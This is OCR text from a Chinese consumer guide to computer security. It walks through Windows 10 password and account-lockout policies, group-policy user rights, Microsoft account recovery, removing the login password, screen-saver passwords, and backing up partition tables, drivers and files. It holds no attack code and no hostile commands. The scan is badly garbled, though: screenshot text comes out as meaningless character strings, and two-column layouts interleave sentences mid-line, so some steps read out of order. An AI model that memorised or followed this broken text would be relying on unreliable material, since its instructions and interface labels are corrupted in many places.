易 被 专用 破解 软件 猜测 到 ， 为 减 小 密码 破解 
的 可 能 性 ， 密 码 应 该 尽量 长 。 而 且 有 特权 用 
户 ( 例 如 Administrators 组 的 用 户 ) 的 密码 长 
度 最 好 超过 12 个 字符 。 一 个 用 来 加 强 密码 长 
度 的 方法 是 使 用 不 在 默认 字符 集中 的 字符 。 


[Step 加 双击 “密码 最 长 使 用 期 限 ” 选 项 ， 打 
开 “ 密 码 最 长 使 用 期 限 属性 ”对 话 框 ， 在 
“密码 过 期 时 间 ” 文 本 框 中 设置 密码 过 期 
的 天 数 。 
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一 个 密码 ， 立 刻 再 更 改 回 原来 的 旧 密 码 。 这 
个 选项 可 用 的 设置 范围 是 0( 密 码 可 随时 修 
改 ) 或 1 一 998 (天) ， 建 议 设置 为 1 天 。 


三 二 区 肌 二 限 屋 性 ? x 


ET 可 以 
1 回 天 


双击 “强制 密码 历史 ”选项 ， 打 开 
“强制 密码 历史 属性 ”对 话 框 ， 根 据 个 人 
情况 设置 保留 密码 历史 的 个 数 。 


本 地 安全 设置 说 六 


理 强制 福 码 历史 


7.6.2 ”开启 账户 锁定 功能 


Windows 10 操 作 系 统 具 有 账户 锁定 功 品 
能 ， 可 以 在 登录 失败 的 次 数 达 到 管理 员 指 
定 次 数 后 锁定 该 账户 。 如 可 以 设 定 在 登录 
失败 次 数 达到 一 定 次 数 后 启用 本 地 账户 锁 
定 ， 可 以 设置 在 一 定 的 时 间 后 自动 解锁 ， 
或 将 锁定 期 限 设置 为 “永久 ”。 

启用 账户 锁定 功能 可 以 使 黑客 不 能 使 
用 该 账户 ， 除 非 只 尝试 少 于 管理 员 设 定 的 
次 数 就 猜 解 出 密码 ， 如 果 自 己 已 经 设置 对 
登录 记录 的 记录 和 检查 ， 并 记录 这 些 登 录 
事件 ， 通 过 检查 登录 日 志 ， 就 可 以 发 现 那 


Estee 图 双击 “密码 最 短 使 用 期 限 ” 选 项 ， 打 
开 “ 密 码 最 短 使 用 期 限 属性 ”对 话 框 。 根 据 
实际 情况 设置 密码 最 短 存留 期 后 ， 单 击 “ 确 
定 ” 按 钮 即 可 。 默 认 情 况 下 ， 用 户 可 在 任何 
时 间 修改 自己 的 密码 ， 因 此 ， 用 户 可 以 更 换 


些 不 安全 的 登录 尝试 。 

如 果 一 个 账户 已 经 被 锁定 ， 管 理 员 可 
以 使 用 Active Directory、 启 用 域 账户 、 使 用 
计算 机 管理 等 来 启用 本 地 账户 ， 而 不 用 等 
待 账 户 自动 启用 。 系 统 自 带 的 Administrator 
账户 不 会 随 着 账户 锁定 策略 的 设置 而 被 锁 
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定 ， 但 当 使 用 远程 桌面 时 ， 会 因为 账户 锁 
定 策略 的 设置 而 使 得 Administrator 账 户 在 设 
置 的 时 间 内 ， 无 法 继续 使 用 远程 桌面 。 

在 “本 地 组 策略 编辑 器 ”窗口 中 启用 
“账户 锁定 ”策略 的 具体 设置 步骤 如 下 。 
[5 国 在 “本地 组 策略 编辑 器 ”窗口 中 展开 
“计算 机 配置 ”一 “Windows 设 置 ”一 “安全 
设置 ”一 “账户 策略 ”一 “账户 锁定 策略 ” 
选项 ， 进 入 “账户 锁定 策略 设置 ” 窗口 。 


E 可 “区 


ls REA) EV) 0 
如 路 | 直 回 | 马 | 目 区 


step 图 在 右 侧 “策略 ”列表 中 双击 “账户 
锁定 阅 值 ”选项 ， 打 开 “ 账 户 锁定 阅 值 属 
性 ”对 话 框 。 


轩 “reaa 


Ce ] 
step 图 在 “账户 不 锁定 ”文本 框 中 根据 实 
际 情况 输入 相应 的 数字 ， 这 里 输入 的 是 3， 

即 表明 登录 失败 3 次 后 被 猜测 的 账户 将 被 
锁定 。 


[ a 
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将 要 下 二 ? x 


THERERE 放下 


里 浆 王 S 二 二天 


和 下 二 之后 的 产 
上 


en 
step 园 单 去 “应 用 ”按钮 ， 弹 出 “建议 的 
数值 改动 ”对 话 框 ， 连 续 单 击 “确定 ” 按 
钮 ， 即 可 完成 应 用 设置 操作 。 


Evry 


国 7 全 = 本 各 基 人 后- 人 天 这 得 好。 下 开 二 的 训 和 亲 人 过 的 R 从 ， 


[ GE 9 
me 不 304 和 0 
awrite 网 30 轨 和 2 后 


Ce wo 

[sep 图 在 “账户 锁定 策略 设置 ”窗口 中 的 
“策略 ”列表 中 双击 “ 重 置 账户 锁定 计数 
器 ”选项 ， 即 可 打开 “ 重 置 账户 锁定 计数 


器 属性 ”对 话 框 ， 在 其 中 设置 重 置 账户 锁 
定 计数 器 的 时 间 。 


| 
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[sp 加 在 “账户 锁定 策略 设置 ”窗口 的 “ 策 Fa 
略 ”列表 中 双击 “账户 锁定 时 间 ” 选 项 ， 0 
即 可 打开 “账户 锁定 时 间 属性 ”对 话 框 ， 


时 "an 


在 其 中 设置 账户 锁定 时 间 。 [一 
[ x rb 
[ea 
情 wema 
ea mm) 和 
后。 间 sw a A Bs 


有 学 和 ， 请 多 网 业 六 汪 写 Et。 (Q823659) 


2 sa 
单 击 “添加 用 户 或 组 ”按钮 ， 即 可 打开 
“选择 用 户 或 组 ”对 话 框 ， 在 “输入 对 象 名 称 
来 选择 ”文本 框 中 输入 添加 对 象 的 名 称 。 


| Ee 9 

7.6.3 ”利用 组 策略 设置 用 户 权限 se | 
当 多 人 共用 一 台 计 算 机 时 ， 可 以 在 ee | 

“本 地 组 策略 编辑 器 ”窗口 中 设置 不 同 的 fro omen Cg 


用 户 权限 ， 这 样 就 限制 黑客 访问 该 计算 机 
时 要 进行 的 某 些 操作 。 利 用 组 策略 设置 用 


A 3 


户 权 限 的 具体 操作 步骤 如 下 。 单 击 “ 确 定 ” 按 钮 ， 即 可 完成 用 户 权 
在 “本 地 组 策略 编辑 器 ”窗口 中 展开 ” 限 的 设置 操作 。 

“计算 机 配置 ”一 “Windows 设 置 ”一 “ 安 

全 设置 ”一 “本 地 策略 ”一 “用 户 权限 分 7.7 ”实战 演练 

配 ” 选 项 ， 即 可 进入 “用 户 权 限 分 配 设置 ” 


实战 演练 1 一 一 禁止 Guest 账 户 在 本 系统 
登录 i 


如 何 才能 加 强 对 Guest 账 户 的 管理 ， 防 

止 被 黑客 利用 呢 ? 用 户 可 以 参照 如 下 方法 
进行 。 
[Estee 加 在 “本 地 组 策略 编辑 器 ”窗口 中 依 
次 展开 “计算 机 配置 ”一 “Windows 设 
置 ” 一 “安全 设置 ”一 “本 地 策略 ”一 
“用 户 权限 分 配 ” 选 项 ， 然 后 在 右 侧 窗口 
中 找到 “允许 本 地 登录 ”选项 并 右 击 和 鼠 
“从 网 络 访问 此 计算 机 ” 选项， 打开“ 从 标 ， 在 弹出 的 快捷 菜单 中 选择 “属性 ” 菜 
网 络 访问 此 计算 机 属性 ”对 话 框 。 单项 。 
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step 图 打开 “允许 本 地 登录 属性 ”对 话 
框 ， 选 择 列 表 框 中 的 Guest 选 项 ， 然 后 单 击 
“删除 ”按钮 ， 使 Guest 账 户 不 能 在 本 地 系 
统 中 登录 。 

加 万 许 本 地 各 妥 


Adminetratore 


i i 


Ucere 


瀛 加 十 户 可 所 (J)-. 


他 
二 Ri 可能 三 吉庆 活 ， 服 和 和 可 者 全 本性 
有 关 主旨 信息 ， 庆 同 化 计 本 地 可 录 。 1Q823659) 


Ce Bm 


加 实战 演练 2 一 一 找 回 Microsoft 账 户 的 登 


在 计算 机 的 使 用 过 程 中 ， 忘 记 开 机 
登录 密码 是 常 有 的 事 ， 而 Windows10 操 作 
系统 的 登录 密码 是 无 法 强行 破解 的 ， 需 要 
登录 微软 的 一 个 找 回 密码 的 网 站 ， 重 置 
密码 ， 才 能 登录 进入 系统 桌面 ， 具 体 的 操 
作 步 又 如 下 。 

[Bes 图 打开 一 台 可 上 网 的 计算 机 ， 在 IE 地 
址 栏 中 输入 找 回 密码 的 网 站 网 址 “account. 
live.com”， 按 Enter 键 ， 进 入 其 操作 界面 。 
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您 的 帐户 


step 图 单 击 “无 法 访问 你 的 账户 ? ” 超 链 
接 ， 打 开 “ 为 何 无 法 登录 ? ”界面 ， 在 其 
中 选中 “我 忘记 了 密码 ” 单 选 按钮 。 
器 
为 何 无 法 登录 ? 


各 谱 我 的 密码， 但 是 却 元 法 瘟 邓 
我 认为 有 入 正在 使 用 我 的 Microsoft 帐户 


职 漳 TT 


单 击 “ 下 一 步 ” 按 钮 ， 打开“ 恢复 

你 的 账户 ”界面 ， 在 其 中 输入 要 恢复 的 

Microsoft 账 户 和 看 到 的 字符 。 
器 

恢复 你 的 帐户 


要 于 的 和 安 主 信息 ,首先 ， 语 输 入 你 
伴 户 ,类 后 近 归 下面 的 涪 明 接 作 ， 


Microsofl 能 户 
onl Out oh co | 


i Da 
Ns 有 
输入 你 看 到 的 字符 
VGN 
2 下 全 


[Step 加 单 去 “下 一 步 ” 按 钮 ， 打 开 “ 我 们 需 
要 验证 你 的 身份 ”界面 ， 在 其 中 选中 “ 短 
信和 至 ####sss8]” 单 选 按钮 ， 并 在 下 方 的 文 
本 框 中 输入 手机 号 码 的 后 四 位 。 

[See 国 单 去 “发 送 代码 ”按钮 ， 即 可 往 手 
机 中 发 送 安全 代码 ， 并 打开 “输入 你 的 安 
全 代码 ”界面 ， 在 其 中 输入 接收 到 的 安全 
代码 。 


如 
我 们 需要 验证 你 的 身份 
RL RE 
pe NN 


区 要 磅 这 是 否 你 的 电话 二 后 。 竹 兴旺 后 4 


Ma 
站 括 岳 后 音 夫 -和 庄 代 村 全 和 愉 丰 人 < 


有 中 作 作 一 唤 
二 RE 


ba 2 


器 
输入 你 的 安全 代码 


加 果 2281 与 你 相 户 上 航 电 话 呈 大 的 后 4 位 匹配 ， 儿 
们 李 疝 全 和 庆 奏 请 


39823465 


人 用 只 他 好 证 和 法 


取 TT 


[Eee 单 击 “ 下 一 步 ” 按 钮 打开“ 重新 设 
置 密码 ”界面 ， 在 其 中 输入 新 的 密码 ， 并 
确认 再 次 输入 新 的 密码 。 
器 
重新 设置 密码 


C2 


ba] TS 


step 国 单 去 “下 一 步 ” 按 钮 ， 打 开 “ 你 的 账 
户 已 恢复 ”界面 ， 在 其 中 提示 用 户 可 以 使 
用 新 的 安全 信息 登录 到 你 的 账户 了 。 
中 
你 的 帐户 已 恢复 


下 所 有 关 你 有 成 的 扣 作 的 二 
[| 
我 们 双 于 这 余 记忆 双 直 考证 。 下 下 过 证 于 一 项 训 红 


究 全 功能 ， 它 侠 了 可 更 夫人 作伪 的 过 和 录 作 的 
覃 P。 了 半 并 们 让 的 计划 所 以 此 五 是 才 这 


启用 了 于 全 ES 
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7.8 小 试 身手 


练习 1: 取消 Windows 开 机 密码 


虽然 使 用 账户 登录 密码 ， 可 以 保护 电脑 加 
的 隐私 安全 ， 但 是 每 次 登录 时 都 要 输入 密 
码 ， 对 于 一 部 分 用 户 来 讲 ， 太 过 于 麻烦 。 
用 户 可 以 根据 需求 ， 选 择 是 否 使 用 开机 密 
码 ， 如 果 希 望 可 以 跳 过 输入 密码 直接 登录 
Windows， 可 以 参照 以 下 步 又 取消 开机 密码 。 
[Step 加 在 电脑 桌面 中 ， 按 Windows+R 组 合 
键 ， 打 开 “ 运 行 ” 对 话 框 ， 在 “打开 ” 文 
本 框 中 输入 netplwiz， 按 Enter 键 确认 。 
己 运 5 x 


FE Windows 将 根据 你 所 绽 入 的 和 名称， 为 你 打开 柜 应 的 程序 、 
文件 突 、 文档 或 Internet 资源 . 


打开 (O): |netplwid| v 
时 全 用 管理 权限 创建 此 任务 。 


EGG 国 弹出 “用 户 账户 ”对 话 框 ， 选 中 本 机 
用 户 ， 并 取消 匀 选 “要 使 用 本 计算 机 ， 用 
户 必须 输入 用 户 名 和 密码 ” 复 选 框 ， 单 击 
“应 用 ”按钮 。 


浏览 (B)… 


用 户 帐户 迪 
用 户 高 级 
中 用 下 列表 授予 或 拒 雹 用 户 沪 问 你 的 计算 机 ， 还 可 以 更 改 其 密码 和 其 他 
设置 
口 要 使 用 本 计算 机 ， 用 户 必须 给 入 用 户 匀 和 密码 (E) 
本 机 用 户 (U): 
用 产 各 组 
qiangu ORA_ASMDBA; ora_dba; ORA_.. 
test ORA_ASMDBA; ORA_INSTALL - 
MDD) SR) 司 性 IO) 
Administrator 的 密码 
中 要 改 室 码 ， 按 Ctrl -Alt-Del 并 选择 "更改 室 码 ". 
重 关 过 到 (P)… 
Cm an 
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step 图 弹出 “自动 登录 ”对 话 框 ， 在 “ 密 
码 ” 文 本 框 和 “确认 密码 ”文本 框 中 输入 
当前 账户 密码 ， 然 后 单 击 “确定 ”按钮 ， 


= 黑客 攻防 与 电脑 安全 从 新 手 到 高 手 ( 微 视频 + 火力 升级 版 ) 


step 图 在 “ 锁 屏 界面 ”设置 窗口 中 单 击 “ 屏 
幕 超时 设置 ” 超 链 接 ， 打 开 “ 电 源 和 睡 
眠 ”设置 界面 ， 在 其 中 可 以 设置 屏幕 和 睡 


即 可 取消 开机 登录 密码 。 眠 的 时 间 。 
自动 登录 x 《+ sa 
EE RE 
称 可 以 对 计算 机 进行 设置 ， 这 样 月 户 条 必 六 名 和 这 
码 。 为 此 ， 请 在 下 画 洗 定 一 个 可 以 自动 登录 的 用 户 : a 示 
屏 进 
用 产 名 CU Adnministrator rd 在 本 中 入 9 傅 部下 ， 经 UUW 下 时 同 后 关闭 
ER pn 10 人 3 多 
OP): 
Ses 
确认 三 码 (CO 睡眠 
ie 
在 失 肖 和 jt9 坟 大 下 ， 电 尖 如 过 MF 时间 上 后 六 入 插 志 
a 
Fi 
[step 园 再 次 重新 登录 时 ， 无 须 输 入 用 户 名 和 wws 相关 设置 
密码 ， 直 接 登 录 系 统 。 wm ee 
2 


了 昌 练习 2: 设置 屏幕 保护 密码 


; 设置 屏幕 保护 密码 也 是 增强 计算 机 安 
全 性 的 一 种 方式 ， 设 置 屏幕 保护 密码 的 具 
体操 作 步 又 如 下 。 

在 桌面 的 空白 处 右 击 鼠标 ， 在 弹出 的 
快捷 菜单 中 选择 “个 性 化 ”选项 。 


手 消 复制 (U) 
国 到 形 时 性-… 
图 i 项 

新 建 [W) 
BT) 
Hl ?性 KR 人 


step 图 打开 “个 性 化 ”窗口 ， 在 其 中 选择 
“ 锁 屏 界面 ”选项 。 


司 国医 


在 汪 录 慰 基 上 显示 Windows 如 出 可 上 
ED 于 
所 88S 


折扣 代入 二 
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在 “ 锁 屏 界面 ”设置 窗口 中 单 击 “ 屏 
幕 保护 程序 设置 ” 超 链接 ， 打 开 “ 屏 幕 保 
护 程 序 设置 ”对 话 框 ， 勾 选 “ 在 恢复 时 显 
示 登 录 屏 幕 ” 复 选 框 。 

届 惰 启 保护 程 序 设置 x 
屏 莫 华 沪 程序 


屏 昔 剑 护 得 序 (S) 
机 ~ 车 了 SIV 
等 待 (W): 1 向 分 i 。 回 在 次 复 时 显示 登录 天幕 (R) 
电源 管理 
通过 渭 整 呈 示 过 庚 和 其 他 生源 没 置 凡 五 车 能 源 或 提供 是 住 性 能 . 
更 改 电 源 设 于 
Ce mw | am 


[Eee 图 在 “屏幕 保护 程序 ”下 拉 列 表 中 选 
择 系统 自 带 的 屏幕 保护 程序 ， 本 实例 选择 
“气泡 ”选项 ， 此 时 在 上 方 的 预览 框 中 可 
以 看 到 设置 后 的 效果 。 


局 慰 芝 扩 香 字 讼 各 


Ce Te Lew 
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屏 专 保护 伍 序 G) 

< van- | WV 
等 三 Wi 5 同人 入。 回 在 和 各 时 旺 寺 于 录 屏 昔 (R) 
所 于 


Cw ]| Ww || sw 


[Eee 图 在 “等 待 ”微调 框 中 设置 等 待 的 时 [Step 园 设置 完成 后 ， 单 击 “ 确 定 ” 按 钮 ， 返 


间 ， 本 实例 设置 为 5 分 钟 。 


回 到 “设置 ”窗口 ， 这 样 ， 如 果 用 户 在 5 分 
钟 内 没有 对 计算 机 进行 任何 操作 ， 系 统 会 
自动 启动 屏幕 保护 程序 ， 用 户 返回 后 输入 
密码 即 可 登录 系统 。 
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第 8 章 


磁盘 数据 安全 的 防护 策略 


计算 机 系统 中 的 大 部 分 数据 都 存储 在 磁盘 中 ， 而 磁盘 又 是 一 个 极 易 出 现 问题 的 部 件 。 
为 了 能 够 有 效 地 保护 计算 机 的 系统 数据 ， 最 有 效 的 方法 就 是 将 系统 数据 进行 备份 ， 这 样 ， 
一 旦 磁盘 出 现 故障 ， 就 能 把 损失 降 到 最 低 。 本 章 介 绍 磁盘 数据 的 防护 策略 ， 主 要 内 容 包 括 
备份 磁盘 各 类 数据 、 还 原 磁盘 各 类 数据 和 恢复 丢失 的 磁盘 数据 等 。 


8.1 ”数据 丢失 的 原因 和 注意 事项 


硬件 故障 、 软 件 破坏 、 病 毒 的 入 侵 、 用 
户 自身 的 错误 操作 等 ， 都 有 可 能 导致 数据 丢 
失 ， 但 大 多 数 情况 下 ， 这 些 找 不 到 的 数据 并 
没有 真正 的 丢失 ， 如 何 恢复 丢失 的 数据 ， 这 
就 需要 根据 数据 丢失 的 具体 原因 而 定 。 


8.1.1 数据 丢失 的 原因 


造成 数据 丢失 的 主要 原因 有 如 下 几 个 
方面 。 

(1) 用 户 的 误 操作 。 由 于 用 户 错误 操 
作 而 导致 数据 丢失 的 情况 ， 在 数据 丢失 的 
主要 原因 中 所 占 比例 也 很 大 。 用 户 极 小 的 
朴 忽 都 可 能 造成 数据 丢失 ， 例 如 用 户 的 误 
删除 或 不 小 心切 断 电 源 等 。 

(2) 黑客 入 侵 与 病毒 感染 。 黑 客 入 侵 
和 病毒 感染 已 越 来 越 受 关注 ， 由 此 造成 的 
数据 破坏 更 不 可 低估 。 而 且 有 些 恶 意 程 序 
具有 格式 硬盘 的 功能 ， 这 对 硬盘 数据 可 以 
造成 毁灭 性 的 损失 。 

(3) 软件 系统 运行 错误 。 由 于 软件 不 
断 更 新 ， 各 种 程序 和 运行 错误 也 就 随 之 增 
加 ， 如 程序 被 迫 意 外 中 止 或 突然 死机 ， 都 
会 使 用 户 当 前 所 运行 的 数据 因 不 能 及 时 保 
存 而 丢失 。 如 在 运行 Microsoft Office Word 
编辑 文档 时 ， 常 常会 发 生 应 用 程序 出 现 错 
误 而 不 得 不 中 止 的 情况 ， 此 时 ， 当 前 文档 
中 的 内 容 就 不 能 完整 保存 甚至 全 部 丢失 。 

(4) 硬盘 损坏 。 硬 件 损 坏 主 要 表现 为 
磁盘 划 伤 、 磁 组 损坏 、 芯 片 及 其 他 元 器 件 


烧 坏 、 突 然 断 电 等 ， 这 些 损坏 造成 的 数据 
丢失 都 是 物理 性 质 的 ， 一 般 通 过 Windows 自 
身 无 法 恢复 数据 。 

(5) 自然 损坏 。 风 、 雷 电 、 洪 水 及 意 
外 事故 (如 电磁 干扰 、 地 板 振动 等 ) 也 有 
可 能 导致 数据 丢失 ， 但 这 一 原因 出 现 的 可 
能 性 比 上 述 几 种 原因 要 低 很 多 。 


8.1.2 ”发 现 数据 丢失 后 的 注意 事项 


当 发 现 计算 机 中 的 硬盘 丢失 数据 后 ， 
应 当 注意 以 下 事项 。 

(1) 当 发 现 自己 硬盘 中 的 数据 丢失 
后 ， 应 立刻 停止 一 些 不 必要 的 操作 ， 如 误 
删除 、 误 格式 化 后 ， 最 好 不 要 再 往 磁盘 中 
写 数据 。 

〈2) 如 果 发 现 丢失 的 是 C 盘 数据 ， 应 立 
即 关 机 ， 以 避免 数据 被 操作 系统 运行 时 产 
生 的 虚拟 内 存 和 临时 文件 破坏 。 

(3) 如 果 是 服务 器 硬盘 阵列 出 现 故 障 ， 
最 好 不 要 进行 初始 化 和 重建 磁盘 阵列 ， 以 
免 增加 恢复 难度 。 

(4) 如果 是 磁盘 出 现 坏 道 读 不 出 来 
时 ， 最 好 不 要 反复 读 盘 。 

(5) 如 果 是 磁盘 阵列 等 硬件 出 现 故 障 ， 
最 好 请 专业 的 维修 人 员 来 对 数据 进行 恢复 。 


备份 磁盘 各 类 数据 


磁盘 当中 存放 的 数据 有 很 多 类 ， 如 分 
区 表 、 引 导 区 、 了 驱动 程序 等 系统 数据 ， 还 
有 电子 邮件 、 系 统 桌 面 数 据 、 磁 盘 文 件 等 


8.2 


本 地 数据 ， 对 这 些 数据 进行 备份 可 以 在 一 
定 程度 上 保护 数据 的 安全 。 


8.2.1 分 区 表 数 据 的 备份 


如 果 分 区 表 损 坏 会 造成 系统 启动 失 
败 、 数 据 丢 失 等 严重 后 果 。 这 里 以 使 用 
DiskGenius V4.9.2.371 软 件 为 例 ， 讲 解 如 何 
备份 分 区 表 ， 具 体 的 操作 步骤 如 下 。 

[stp 回 打开 软件 DiskGenius V4.9.2.371， 选 
择 需 要 保存 备份 分 区 表 的 分 区 。 


选择 “硬盘 ”一 “备份 分 区 表 ” 菜 单 
项 ， 用 户 也 可 以 按 F9 键 备份 分 区 表 。 


弹出 “设置 分 区 表 备份 文件 名 及 路 
径 ” 对 话 框 ， 在 “文件 名 ”文本 框 中 输入 
备份 分 区 表 的 名 称 。 
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[step 园 单 击 “保存 ”按钮 ， 即 可 开始 备份 分 
区 表 。 当 备份 完成 后 ， 弹 出 “DiskGenius” 
提示 框 ， 提 示 用 户 当前 硬盘 的 分 区 表 已 经 
备份 到 指定 的 文件 中 。 


DiskGenis x 


Se hoounowosopomio eu osc oD 
-CNbeereydmiricratcDecumerts 六 全 区 表 Pf， 
的 交 全 ， 泽 计 全 到 当前 而 二 [外 的 要 和 成 芭 它 


医 琶 司 


侈 提示 :为 了 分 区 表 备份 文件 的 安全 ， 建 
议 将 其 保存 到 当前 硬盘 以 外 的 硬盘 或 其 他 存 
储 介质 中 ， 如 优盘 、 移 动 硬盘 和 光碟 等 。 


8.2.2 ”驱动 程序 的 修复 与 备份 


在 Windows 10 操 作 系统 中 ， 用 户 可 以 对 名 
指定 的 驱动 程序 进行 备份 。 一 般 情况 下 ， 
用 户 备份 驱动 程序 常常 借助 于 第 三 方 软件 ， 
比较 常用 的 是 《驱动 精灵 》。 


1. 使 用 《驱动 精灵 》 修 复 有 异常 的 驱动 


《驱动 精灵 》 是 由 驱动 之 家 研发 的 一 款 
集 驱 动 自动 升级 、 驱 动 备份 、 驱 动 还 原 、 
驱动 卸载 、 硬 件 检测 等 多 功能 于 一 身 的 专 
业 驱 动 软件 。 利 用 驱动 精灵 可 以 在 没有 驱 
动 光盘 的 情况 下 ， 为 自己 的 设备 下 载 、 安 
装 、 升 级 、 备 份 驱动 程序 。 

使 用 《驱动 精灵 》 修 复 异 常 驱动 的 具 
体操 作 步 骤 如 下 。 
下 载 并 安装 好 《了 驱动 精灵 》 后 ， 直 接 
双击 计算 机 桌面 上 的 “驱动 精灵 ”图 标 ， 
即 可 打开 该 程序 。 
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Bg 加 在 “驱动 精灵 ”窗口 中 单 去 “立即 
检测 ”按钮 ， 即 可 开始 对 计算 机 进行 全 面 
体检 。 


[| 正在 检测 驱动 信息 


[step 图 检测 完成 后 ， 会 在 “驱动 管理 ”界面 
给 出 检测 结果 。 


[el 3 个 设备 异常 ， 需 安装 驱动 
本 动 管理 下 区 


要 的 人 件 香 避 过 姑 二 


[Sep 四 单 去 “一 键 安装 ”按钮 ， 
载 并 安装 有 异常 的 驱动 程序 。 


大 了 恰 测 


CD 
2. 使 用 《驱动 精灵 》 备 份 单个 驱动 
使 用 《驱动 精灵 》 备 份 单个 驱动 的 具 

体操 作 步骤 如 下 。 


step 园 在 “驱动 精灵 ”窗口 中 选择 “ 百 宝 
箱 ” 选 项 卡 ， 进 入 “百宝箱 ”界面 。 
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= 黑客 攻防 与 电脑 安全 从 新 手 到 高 手 ( 微 视频 + 火力 升级 版 ) 


[Bee 国 单 去 “驱动 备份 ”图 标 ， 打 开 “ 驱 动 
备份 还 原 ” 工 作 界面 ， 在 其 中 显示 了 可 以 
备份 的 驱动 程序 。 


i) Sp an es me [可 


[step 图 单 击 “ 修 改 文 件 路 径 ” 链 接 ， 即 可 打 
开 “ 设 置 ” 对 话 框 ， 在 其 中 可 以 设置 驱动 
备份 文件 的 保存 位 置 和 备份 设置 类 型 ， 如 
将 驱动 备份 的 类 型 设置 为 ZIP 压 缩 文件 或 备 
份 驱动 到 文件 夹 两 个 类 型 。 


[step 园 设置 完毕 后 ， 单 击 “ 确 定 ” 按 钮 ， 返 
回 到 “驱动 备份 还 原 ” 工 作 界面 ， 在 其 中 
单 击 某 个 驱动 程序 右 侧 的 “备份 ”按钮 ， 
即 可 开始 备份 单个 硬件 的 驱动 程序 ， 并 显 
示 备 份 的 进度 。 


step 图 备份 完毕 后 ， 会 在 硬件 驱动 程序 的 后 
侧 显示 “备份 完成 ”的 信息 提示 。 


加 wwe oh oton tet wes E33 


3. 使 用 《驱动 精灵 》 一 键 备份 所 有 驱动 


一 台 完 整 的 计算 机 包括 主板 、 显 卡 、 
网 卡 、 声 卡 等 硬件 设备 ， 要 想 这 些 设 备 能 
够 正常 工作 ， 就 必须 在 安装 好 操作 系统 
后 ， 安 装 相应 的 驱动 程序 。 因 此 ， 在 备份 
驱动 程序 时 ， 最 好 将 所 有 的 驱动 程序 都 进 
行 备份 。 使 用 《驱动 精灵 》 一 键 备 份 所 有 
驱动 的 具体 操作 步骤 如 下 。 

[step 国 在 “驱动 备份 还 原 ” 工 作 界 面 中 单 击 
“一 键 备份 ”按钮 。 


一 一 您 有 8 个 驱动 可 以 备份 
7 


step 图 此 时 ， 即 可 开始 备份 所 有 硬件 的 驱动 
程序 ， 并 在 后 面 显示 备份 的 进度 。 


step 图 备份 完成 后 ， 会 在 硬件 驱动 程序 的 右 
侧 显 示 “ 备 份 完成 ”的 信息 提示 。 


8.2.3 ”磁盘 文件 数据 的 备份 


Windows 10 操 作 系 统 为 用 户 提供 了 外 
备份 文件 的 功能 ， 用 户 只 需 通 过 简单 的 设 
置 ， 就 可 以 确保 文件 不 会 丢失 。 备 份 文件 
的 具体 操作 步骤 如 下 。 

[sep 回 右 击 “开始 ”按钮 ， 在 打开 的 快捷 
菜单 中 选择 “控制 面板 ”菜单 命令 ， 弹 出 
“控制 面板 ”窗口 。 


EE = 
+ 加 1 2 请 vl 


tt 


系统 和 安全 


[Eee 图 在 “控制 面板 ”窗口 中 单 击 “查看 方 
式 ” 右 侧 的 下 拉 按 钮 ， 在 打开 的 下 拉 列 表 
中 选择 “小 图 标 ” 选 项 ， 单 击 “备份 和 还 
原 ” 链 接 。 
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磁盘 数据 安全 的 防护 策略 ES 


SEE 黑客 攻防 与 电脑 安全 从 新 手 到 高 手 ( 微 视频 + 火力 升级 版 ) 


EE = x 
+ 个 国 ， NG， Sen 

调整 计算 机 的 设 得 EE 4 

tocker 三 if 客 reh oer meme 

国 Mail Miorocok Oudeok 2016) 。。 明 Remotehpp 和 EE 当 i Window ceiencer 

闪 Wndows WX 二 Peerser 地 

[oon EE a 

各 二 RE 加 1 化 防 工 Exf 

入 Ta 加 三 re 

= 加 3/ 二 Be 

国有 ES Os Ens 

EmouA 二 eae Rr 

本 = [TD EL A A 
OFsro Rssar 央 24Feaa A Mt 

图 文人 潜 源 理 吕 这 机 LE 加 5 

三 Bee 更 es 最 册 - 

凤 于 | od 

Re Ea 


step 国 弹出 “备份 或 还 原 你 的 文件 ”窗口 ， 
在 “备份 ”下 面 显 示 “ 尚 未 设置 Windows 备 
份 ” 信 息 ， 表 示 还 没有 创建 备份 。 


俱全 0 还 原 -0o 
< 个 好 、 所 有 控制 夯 .。 ， 备 份 和 还 原 v © 
Nr 备份 还 原 你 的 文件 
创建 系统 映像 有 从 
创建 乔 人 中 :下 向 地 设置 Windowe 竹 全 - Dn 
还 原 


windows 后 . 
ENCEPENT NN) 


2 人 SH 
BE 


[step 贺 单 击 “设置 备份 ”按钮 ， 弹 出 “设置 
备份 ”对 话 框 ， 系 统 开始 启动 Windows 备 
份 ， 并 显示 启动 的 进度 。 
Wa CX 
网 正在 启动 Windows 备份 
Windows 备份 正在 启动 ， 请 稍 收 
pm 


[step 图 启动 完毕 后 ， 将 弹出 “选择 要 保存 
备份 的 位 置 ” 对 话 框 ， 在 “保存 备份 的 位 
置 ” 列 表 框 中 选择 要 保存 备份 的 位 置 。 如 
果 想 保存 在 网 络 上 的 位 置 ， 可 以 选择 “ 保 
存在 网 络 上 ”按钮 。 这 里 将 保存 备份 的 
位 置 设置 为 本 地 磁盘 G:， 因 此 选择 “本 
地 磁盘 (G:) ”选项 ， 单 击 “ 下 一 步 ” 
按钮 。 
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[step 园 弹出 “您 希望 备份 哪些 内 容 ? ”对 话 
框 ， 选 中 “让 我 选择 ” 单 选 按钮 。 如 果 选 中 
“让 Windows 选 择 〈 推 荐 ) ” 单 选 按钮 ， 则 
系统 会 备份 库 、 桌 面 上 及 在 计算 机 上 拥有 用 
户 账户 的 所 有 人 员 的 默认 Windows 文 件 夹 中 
保存 的 数据 文件 ， 单 击 “ 下 一 步 ” 按 钮 。 


x 
« anes 

你 弟 钥 生 份 吉 此 内容? 

Oi widow Sm 


Wndows FTEE. A Windews 这 入 半 、Window 一个 
> 和 用 了 一 瑟 机 二 下 基 工 林原 关上 


im 
二 


[CE ] | ww 


[step 园 在 打开 的 对 话 框 中 选择 需要 备份 的 文 
件 ， 如 匀 选 “Excel 办 公 ” 文 件 夹 左 侧 的 复 
选 框 ， 单 击 “ 下 一 步 ” 按 钮 。 


[step 图 弹出 “查看 备份 设置 ”对 话 框 ， 在 
“计划 ” 右 侧 显 示 自 动 备份 的 时 间 ， 单 击 
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Step 加 单 去 “保存 设置 并 运行 备份 ”按钮 ， 
弹出 “备份 和 还 原 ” 窗 口 ， 系 统 开始 自动 


“更 改 计划 ”链接 。 备份 文件 并 显示 备份 的 进度 。 
FT x 
< € 个 就 二 ENW 夯 - 下 和 Vo) We 万 
查看 备份 设 豆 | 备份 或 还 原 你 的 文件 
各 芳 们 要 志 交 袜 间 (G0 ei 
之 2, 1+ 
i Es 
